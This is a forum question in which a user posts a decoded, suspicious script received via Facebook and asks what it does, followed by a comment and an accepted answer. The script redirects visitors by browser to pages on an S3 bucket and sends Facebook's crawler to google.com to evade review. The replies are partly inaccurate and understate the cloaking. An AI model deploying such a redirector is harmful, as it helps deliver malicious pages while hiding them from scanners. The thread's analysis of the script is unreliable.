# Unescaped String in HTML

Tags: javascript

This Was sent to me in Facebook embedded in a HTML.. i didnt open this since i suspected it. Can anyone please tell me what it does?

> **Problem Statement** : This is was written using `document.write(unescape('<something here>');`
>   I unescaped this.

```
`<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://s3.amazonaws.com/video-asntjhwert/s.html";
} // ]]>
</script>     
<script language=javascript>
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("http://s3.amazonaws.com/video-asntjhwert/s.html");
}
</script>
 <body>

<script>


if (navigator['userAgent']['indexOf']('Firefox') != -1) {
    window['location'] = 'https://s3.amazonaws.com/video-asntjhwert/index.html';
} else {
    if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {
        window['location'] = 'http://google.com/';
    } else {
        if (navigator['userAgent']['indexOf']('Chrome') != -1) {
            window['location'] = 'https://s3.amazonaws.com/video-asntjhwert/index.html';
            } else {
            window['location'] = 'http://s3.amazonaws.com/video-asntjhwert/s.html';
        };
    };
};
</script>
</body>'));
```

`

Comment: it checks which browser you are using and it will redirect you to s3.amazonnews.com site... its kinda adware script

Answer (score 0, accepted):

The first part checks which mobile OS You are using Android or iOS,
whereas the second part looks for PC browsers, and there is one thing common between them, its reroutes you to a webpage, hosted potentially on AWS servers and probably is a video, and you can conclude that its mostly an Ad! But be aware it may be a malware in disguise too injected by some one!